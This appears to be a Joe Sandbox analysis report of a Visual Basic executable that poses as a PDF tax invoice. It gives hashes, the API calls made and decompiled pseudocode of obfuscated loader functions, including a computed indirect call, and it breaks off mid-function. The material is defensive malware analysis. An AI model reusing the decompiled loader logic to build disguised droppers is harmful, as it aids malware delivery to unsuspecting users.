Commandline:	'C:\Users\user\Desktop\NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	69273783DA83C97FF021E1002243DD8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100 Parent PID: 5944 NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exeCOMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	10%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	1

Executed Functions

Function 00418624, Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00418624(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v3;
				void* _v5;
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				signed int _v64;
				char _v68;
				char _v72;
				signed int _v76;
				char _v80;
				char _v96;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v120;
				char _v128;
				intOrPtr _v136;
				char _v144;
				char* _v152;
				char _v160;
				intOrPtr _v168;
				char _v176;
				signed int _v184;
				char _v192;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				char _v248;
				char _v264;
				signed int _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				intOrPtr* _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr _v1924090815;
				signed int _t165;
				signed int _t166;
				signed int _t171;
				signed int _t177;
				signed int _t183;
				char* _t185;
				signed int _t188;
				char* _t196;
				char* _t199;
				char* _t214;
				void* _t225;
				void* _t229;
				intOrPtr _t230;
				void* _t231;

				_t230 = _t229 - 0x18;
				 *[fs:0x0] = _t230;
				L004014B0();
				_v28 = _t230;
				_v24 = 0x401440;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014b6, _t225);
				_v8 = 1;
				_v8 = 2;
				E004115A0();
				L00401564();
				_v8 = 3;
				L0040155E();
				_v8 = 4;
				_t165 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 0xffffffff);
				asm("fclex");
				_v216 = _t165;
				if(_v216 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x411138);
					_push(_a4);
					_push(_v216);
					L00401690();
					_v296 = _t165;
				}
				_v8 = 5;
				_t166 =  &_v68;
				L00401558();
				E004114AC(); // executed
				_v212 = _t166;
				L00401564();
				_v64 = _v212;
				L0040165A();
				_v8 = 6;
				_t171 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v212, 1, _t166, _t166, L"c:\\a\\a.sys", 0, 0x140, 0xc8, 0x10);
				asm("fclex");
				_v216 = _t171;
				if(_v216 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x411138);
					_push(_a4);
					_push(_v216);
					L00401690();
					_v300 = _t171;
				}
				_push(_v212);
				E0041153C();
				L00401564();
				_v8 = 7;
				E004115A0();
				L00401564();
				_v8 = 8;
				_push(_v64);
				_push(2);
				E004115EC();
				L00401564();
				_v8 = 9;
				_push(2);
				E00411640();
				_v212 = _t171;
				L00401564();
				_v8 = 0xb;
				E004114F4();
				L00401564();
				_v8 = 0xc;
				if( *0x41a31c != 0) {
					_v304 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v304 = 0x41a31c;
				}
				_v216 =  *_v304;
				_t177 =  *((intOrPtr*)( *_v216 + 0x1c))(_v216,  &_v72);
				asm("fclex");
				_v220 = _t177;
				if(_v220 >= 0) {
					_v308 = _v308 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x411778);
					_push(_v216);
					_push(_v220);
					L00401690();
					_v308 = _t177;
				}
				_v224 = _v72;
				_v152 = 2;
				_v160 = 3;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t183 =  *((intOrPtr*)( *_v224 + 0x54))(_v224, 0x10,  &_v76);
				asm("fclex");
				_v228 = _t183;
				if(_v228 >= 0) {
					_v312 = _v312 & 0x00000000;
				} else {
					_push(0x54);
					_push(0x4119f0);
					_push(_v224);
					_push(_v228);
					L00401690();
					_v312 = _t183;
				}
				_v288 = _v76;
				_v76 = _v76 & 0x00000000;
				_t185 =  &_v80;
				L0040169C();
				_t188 =  *((intOrPtr*)( *_a4 + 0x154))(_a4, _t185, _t185, _v288);
				asm("fclex");
				_v232 = _t188;
				if(_v232 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x154);
					_push(0x411138);
					_push(_a4);
					_push(_v232);
					L00401690();
					_v316 = _t188;
				}
				_push( &_v80);
				_push( &_v72);
				_push(2);
				L00401654();
				_t231 = _t230 + 0xc;
				_v8 = 0xd;
				_v152 = 1;
				_v160 = 2;
				_v168 = 0x1c977;
				_v176 = 3;
				_v184 = _v184 & 0x00000000;
				_v192 = 2;
				_push( &_v160);
				_push( &_v176);
				_push( &_v192);
				_push( &_v264);
				_push( &_v248);
				_t196 =  &_v52;
				_push(_t196);
				L00401552();
				_v292 = _t196;
				while(_v292 != 0) {
					_v8 = 0xe;
					if(_v64 == 0x91b) {
						_v8 = 0xf;
						_v136 = 0x80020004;
						_v144 = 0xa;
						_v120 = 0x80020004;
						_v128 = 0xa;
						_v104 = 0x80020004;
						_v112 = 0xa;
						_v152 = L"There was an error while loading the bitmap";
						_v160 = 8;
						L004015FA();
						_push( &_v144);
						_push( &_v128);
						_push( &_v112);
						_push(0);
						_push( &_v96);
						L0040154C();
						_push( &_v144);
						_push( &_v128);
						_push( &_v112);
						_push( &_v96);
						_push(4);
						L00401666();
						_t231 = _t231 + 0x14;
					}
					_v8 = 0x11;
					E004114F4();
					L00401564();
					_v8 = 0x12;
					_push( &_v264);
					_push( &_v248);
					_t199 =  &_v52;
					_push(_t199);
					L00401546();
					_v292 = _t199;
				}
				_v8 = 0x13;
				_v12 = 0xffd4b926;
				_v12 = _v12 + 0x6c1c73;
				_v12();
				_v1924090815 = _v1924090815 - 1;
				_push(0xbc458d50);
				_push(3);
				L00401654();
				_push( &_v144);
				_push( &_v128);
				_push( &_v112);
				_t214 =  &_v96;
				_push(_t214);
				_push(4);
				L00401666();
				return _t214;
			}

0x00418627
0x00418636
0x00418642
0x0041864a
0x0041864d
0x0041865a
0x00418663
0x00418666
0x00418675
0x00418678
0x0041867f
0x00418686
0x0041868b
0x00418690
0x00418699
0x0041869e
0x004186ad
0x004186b3
0x004186b5
0x004186c2
0x004186e4
0x004186c4
0x004186c4
0x004186c9
0x004186ce
0x004186d1
0x004186d7
0x004186dc
0x004186dc
0x004186eb
0x00418705
0x00418709
0x00418711
0x00418716
0x0041871c
0x00418727
0x0041872d
0x00418732
0x00418748
0x0041874b
0x0041874d
0x0041875a
0x00418779
0x0041875c
0x0041875c
0x0041875e
0x00418763
0x00418766
0x0041876c
0x00418771
0x00418771
0x00418780
0x00418786
0x0041878b
0x00418790
0x00418797
0x0041879c
0x004187a1
0x004187a8
0x004187ab
0x004187ad
0x004187b2
0x004187b7
0x004187be
0x004187c0
0x004187c5
0x004187cb
0x004187d0
0x004187d7
0x004187dc
0x004187e1
0x004187ef
0x0041880c
0x004187f1
0x004187f1
0x004187f6
0x004187fb
0x00418800
0x00418800
0x0041881e
0x00418836
0x00418839
0x0041883b
0x00418848
0x0041886a
0x0041884a
0x0041884a
0x0041884c
0x00418851
0x00418857
0x0041885d
0x00418862
0x00418862
0x00418874
0x0041887a
0x00418884
0x00418895
0x004188a2
0x004188a3
0x004188a4
0x004188a5
0x004188b4
0x004188b7
0x004188b9
0x004188c6
0x004188e8
0x004188c8
0x004188c8
0x004188ca
0x004188cf
0x004188d5
0x004188db
0x004188e0
0x004188e0
0x004188f2
0x004188f8
0x00418902
0x00418906
0x00418914
0x0041891a
0x0041891c
0x00418929
0x0041894b
0x0041892b
0x0041892b
0x00418930
0x00418935
0x00418938
0x0041893e
0x00418943
0x00418943
0x00418955
0x00418959
0x0041895a
0x0041895c
0x00418961
0x00418964
0x0041896b
0x00418975
0x0041897f
0x00418989
0x00418993
0x0041899a
0x004189aa
0x004189b1
0x004189b8
0x004189bf
0x004189c6
0x004189c7
0x004189ca
0x004189cb
0x004189d0
0x00418ab4
0x004189db
0x004189e9
0x004189ef
0x004189f6
0x00418a00
0x00418a0a
0x00418a11
0x00418a18
0x00418a1f
0x00418a26
0x00418a30
0x00418a43
0x00418a4e
0x00418a52
0x00418a56
0x00418a57
0x00418a5c
0x00418a5d
0x00418a68
0x00418a6c
0x00418a70
0x00418a74
0x00418a75
0x00418a77
0x00418a7c
0x00418a7c
0x00418a7f
0x00418a86
0x00418a8b
0x00418a90
0x00418a9d
0x00418aa4
0x00418aa5
0x00418aa8
0x00418aa9
0x00418aae
0x00418aae
0x00418ac1
0x00418ac8
0x00418acf
0x00418ad6
0x00418ae4
0x00418af0
0x00418af1
0x00418af3
0x00418b01
0x00418b05
0x00418b09
0x00418b0a
0x00418b0d
0x00418b0e
0x00418b10
0x00418b18

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00418642
__vbaSetSystemError.MSVBVM60(?,?,?,?,004014B6), ref: 0041868B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004014B6), ref: 00418699
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411138,000002B4), ref: 004186D7
__vbaStrToAnsi.MSVBVM60(?,c:\a\a.sys,00000000,00000140,000000C8,00000010), ref: 00418709
__vbaSetSystemError.MSVBVM60(00000001,00000000,?,c:\a\a.sys,00000000,00000140,000000C8,00000010), ref: 0041871C
__vbaFreeStr.MSVBVM60(00000001,00000000,?,c:\a\a.sys,00000000,00000140,000000C8,00000010), ref: 0041872D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411138,00000058), ref: 0041876C
__vbaSetSystemError.MSVBVM60(?), ref: 0041878B
__vbaSetSystemError.MSVBVM60(?), ref: 0041879C
__vbaSetSystemError.MSVBVM60(00000002,?,?), ref: 004187B2
__vbaSetSystemError.MSVBVM60(00000002,00000002,?,?), ref: 004187CB
__vbaSetSystemError.MSVBVM60(00000002,00000002,?,?), ref: 004187DC
__vbaNew2.MSVBVM60(00411788,0041A31C,00000002,00000002,?,?), ref: 004187FB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411778,0000001C), ref: 0041885D
__vbaChkstk.MSVBVM60(?), ref: 00418895
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119F0,00000054), ref: 004188DB
__vbaObjSet.MSVBVM60(?,?), ref: 00418906
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411138,00000154), ref: 0041893E
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041895C
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 004189CB
__vbaVarDup.MSVBVM60 ref: 00418A43
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 00418A5D
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 00418A77
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,004014B6), ref: 00418A8B
__vbaVarForNext.MSVBVM60(?,?,?), ref: 00418AA9
__vbaFreeObjList.MSVBVM60(00000003,BC458D50), ref: 00418AF3
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00418B10

Strings

c:\a\a.sys, xrefs: 00418700
There was an error while loading the bitmap, xrefs: 00418A26

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Error$System$CheckFreeHresult$List$Chkstk$#595AnsiInitNew2Next
String ID: There was an error while loading the bitmap$c:\a\a.sys
API String ID: 2172363421-3807692072
Opcode ID: b702d7baf83386da2e1d9ae4b5714ef4208c41db89e7d291afd8ebf43d76722c
Instruction ID: a6d0a6ec14a246cfde39f4033f9ec3c8487e4b6ba0b10008df1740da563a0e56
Opcode Fuzzy Hash: b702d7baf83386da2e1d9ae4b5714ef4208c41db89e7d291afd8ebf43d76722c
Instruction Fuzzy Hash: 79D1F9B1C00218EFDF10EF91CD45BDDBBB8AF04304F1080AAE609BB1A1DB795A859F65

Uniqueness

Uniqueness Score: -1.00%

Function 004016BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			_entry_(signed int __eax) {

				_push("VB5!6&*"); // executed
				L004016B4(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				return __eax;
			}

0x004016bc
0x004016c1
0x004016c6
0x004016c8
0x004016ca
0x004016cc
0x004016ce
0x004016d2
0x004016d4
0x004016d6
0x004016d8

APIs

#100.MSVBVM60(VB5!6&*), ref: 004016C1

Strings

VB5!6&*, xrefs: 004016BC

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ece3d9be62e50cb10a46b3acdc3da969bd5b8bfc2fec5402e0395315e0c36f6e
Instruction ID: 67a49faa0692a2812cb78588d91f0669c3579b7f8a65ef22c6ca59a56f4b63d0
Opcode Fuzzy Hash: ece3d9be62e50cb10a46b3acdc3da969bd5b8bfc2fec5402e0395315e0c36f6e
Instruction Fuzzy Hash: F3D0B6A240F3C01ED3036370896254A3F700C2324070F08E380C0CE0B3885C1888C336

Uniqueness

Uniqueness Score: -1.00%

Function 004114AC, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c9b5a6ac8fee753608dfc16b47157560b12216b356f0e5b28cdcaa96b2ce3b
Instruction ID: 4972775d6d86d3208d8d0dae99557e599f64ce9b80fa9b0d4c3e8c17e9e577d9
Opcode Fuzzy Hash: 69c9b5a6ac8fee753608dfc16b47157560b12216b356f0e5b28cdcaa96b2ce3b
Instruction Fuzzy Hash: D5B01230385041AF5600C3A48D02DF412809244BC03388C33F201C62F2E73CCC40812E

Uniqueness

Uniqueness Score: -1.00%

Function 004115A0, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d762afac26abe5501fb9f74156c2cb37f8e11c2a2644d572d911c94f9e4c1c
Instruction ID: c724b062382dbdf33e2c3d9899f6fbcc499ed54830f3d5b893f6ee7d654cd47b
Opcode Fuzzy Hash: 81d762afac26abe5501fb9f74156c2cb37f8e11c2a2644d572d911c94f9e4c1c
Instruction Fuzzy Hash: 15B012303C5005BB530043547C039E41191E6C13803304C33FA13D91F0D628CD40826E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02231530, Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3e78356e2655e7c209609f6b64565b7663905fd7a3ddb336acd6063c7309578
Instruction ID: b4395744722a6364c2f8e227928706327e8566d642c3df2e114ae113c59c92fd
Opcode Fuzzy Hash: b3e78356e2655e7c209609f6b64565b7663905fd7a3ddb336acd6063c7309578
Instruction Fuzzy Hash: 4D0258B1750306AFEB269EA8CCC0BE977A2FF45354F584238FD4997284C7B59894CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0, Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e1a3c3b83ed43986b672609e46786a39e37f67f88f1cc6e6180be4cd3dac6f
Instruction ID: 8d917cc32715ef94079381d410f76caf84883153b8b3800273f5509e62671054
Opcode Fuzzy Hash: e1e1a3c3b83ed43986b672609e46786a39e37f67f88f1cc6e6180be4cd3dac6f
Instruction Fuzzy Hash: 4DD14772A15B926EDB7AC93CDC448D23F74C606334316537AD491CB2D6CBB2AC5BD288

Uniqueness

Uniqueness Score: -1.00%

Function 02231868, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18de4cf34ab6fd5c5b8e98da616355664c1be851cbefc01e10e2b5d28444440
Instruction ID: d6f6a9664a3415bd0b76f06aeeb7c668d26d76b7f55a6d5946a81e7baba99697
Opcode Fuzzy Hash: d18de4cf34ab6fd5c5b8e98da616355664c1be851cbefc01e10e2b5d28444440
Instruction Fuzzy Hash: F9314CB17107139FE76A9AA8CC90BD673A6BF567B0F1C4334EC5C83294D762D8548A80

Uniqueness

Uniqueness Score: -1.00%

Function 02233972, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6d4d38f9f54c8499df6df0bc9aa4f60e2370d35c769a0135c46e25c1e66994
Instruction ID: 0a31affa512a36accc8df3f12673a8af0bdbc26544fdaf2cc6c940779a7f3ca5
Opcode Fuzzy Hash: 3c6d4d38f9f54c8499df6df0bc9aa4f60e2370d35c769a0135c46e25c1e66994
Instruction Fuzzy Hash: D9F050D123C3466EEB0BD9D514E17B627CE4B16755F0440D5D8C3C710DD2D4CA44C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 02234523, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8df106c71d245ed9aa9044a92593802f3732df23b20019a86bec9c8db26d532a
Instruction ID: fce0402da73fb042958285dcc0f9c870a738a95fb23c9ce71fb9add725a42b8e
Opcode Fuzzy Hash: 8df106c71d245ed9aa9044a92593802f3732df23b20019a86bec9c8db26d532a
Instruction Fuzzy Hash: DCF065B77223018FD726EA54C1D0F5673A5AB64740F8544A5D841CB265C334D840CA11

Uniqueness

Uniqueness Score: -1.00%

Function 0041153C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6d550a6d895c44808c4f8b04d5c3aa5a6a83fb738e3586621f857dc646979a
Instruction ID: 07d71b81534660b7dd7e2d771e5f02ff916bf1c7b486373d0dd7217f7fb7ad78
Opcode Fuzzy Hash: bc6d550a6d895c44808c4f8b04d5c3aa5a6a83fb738e3586621f857dc646979a
Instruction Fuzzy Hash: ADB01270384013FB561083589C028E812D192C03803304C33F203C52F0E77CCD80C52E

Uniqueness

Uniqueness Score: -1.00%

Function 02234771, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 022325D3, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 022340BB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1166657549.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c4ac11659b669c253b7f9ac75e689e2e22de94f5b4dc906d2462eff9ec1e31
Instruction ID: 517354551a947fbc9aa370423e5ea1d110a510fc420efa68d4bb884183bac295
Opcode Fuzzy Hash: d8c4ac11659b669c253b7f9ac75e689e2e22de94f5b4dc906d2462eff9ec1e31
Instruction Fuzzy Hash: 92B002756556408FCE59CA09D190E5473A4BB48750B515494E415C7B11C264E900C914

Uniqueness

Uniqueness Score: -1.00%

Function 0041483A, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0041483A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				void* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed long long _v124;
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _t94;
				char* _t98;
				char* _t102;
				signed int _t106;
				char* _t107;
				char* _t108;
				signed int _t111;
				char* _t116;
				signed int _t120;
				intOrPtr _t134;
				void* _t148;
				void* _t150;
				intOrPtr _t151;
				intOrPtr* _t152;
				signed long long _t165;
				signed int _t169;

				_t151 = _t150 - 0xc;
				 *[fs:0x0] = _t151;
				L004014B0();
				_v16 = _t151;
				_v12 = 0x4011f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4014b6, _t148);
				L00401684();
				_v56 = 1;
				_v64 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t94 =  &_v64;
				_push(_t94);
				L00401630();
				L00401648();
				L00401636();
				_push(0);
				_push(0xffffffff);
				_push(0x4117f8);
				_push("ABC");
				L0040162A();
				if(_t94 != 3) {
					if( *0x41a010 != 0) {
						_v108 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v108 = 0x41a010;
					}
					_t116 =  &_v44;
					L0040169C();
					_v84 = _t116;
					_t120 =  *((intOrPtr*)( *_v84 + 0x188))(_v84,  &_v40, _t116,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x32c))( *_v108));
					asm("fclex");
					_v88 = _t120;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x4117fc);
						_push(_v84);
						_push(_v88);
						L00401690();
						_v112 = _t120;
					}
					_v104 = _v40;
					_v40 = _v40 & 0x00000000;
					_v56 = _v104;
					_v64 = 8;
					_t94 =  &_v64;
					_push(_t94);
					L00401624();
					L00401648();
					L0040168A();
					L00401636();
				}
				_push(0x411810);
				L0040161E();
				L00401648();
				_push(_t94);
				_push(0x411818);
				L0040164E();
				asm("sbb eax, eax");
				_v84 =  ~( ~( ~_t94));
				L0040165A();
				_t98 = _v84;
				if(_t98 != 0) {
					if( *0x41a010 != 0) {
						_v116 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v116 = 0x41a010;
					}
					_t134 =  *((intOrPtr*)( *_v116));
					_t102 =  &_v44;
					L0040169C();
					_v84 = _t102;
					_t106 =  *((intOrPtr*)( *_v84 + 0x100))(_v84,  &_v48, _t102,  *((intOrPtr*)(_t134 + 0x318))( *_v116));
					asm("fclex");
					_v88 = _t106;
					if(_v88 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x100);
						_push(0x41181c);
						_push(_v84);
						_push(_v88);
						L00401690();
						_v120 = _t106;
					}
					_push(0);
					_push(0);
					_push(_v48);
					_t107 =  &_v64;
					_push(_t107);
					L00401618();
					_t152 = _t151 + 0x10;
					_push(_t134);
					_v112 =  *0x4011e8;
					_t165 =  *0x4011e0 *  *0x4011d8;
					if( *0x41a000 != 0) {
						_push( *0x4011d4);
						_push( *0x4011d0);
						L004014D4();
					} else {
						_t165 = _t165 /  *0x4011d0;
					}
					_v124 = _t165;
					_v128 =  *0x4011c8;
					L00401612();
					_t169 =  *0x4011bc;
					_v136 = _t169;
					_t108 =  &_v64;
					L0040160C();
					_v128 = _t108;
					asm("fild dword [ebp-0x7c]");
					_v132 = _t169;
					 *_t152 = _v132;
					 *_t152 =  *0x4011b8;
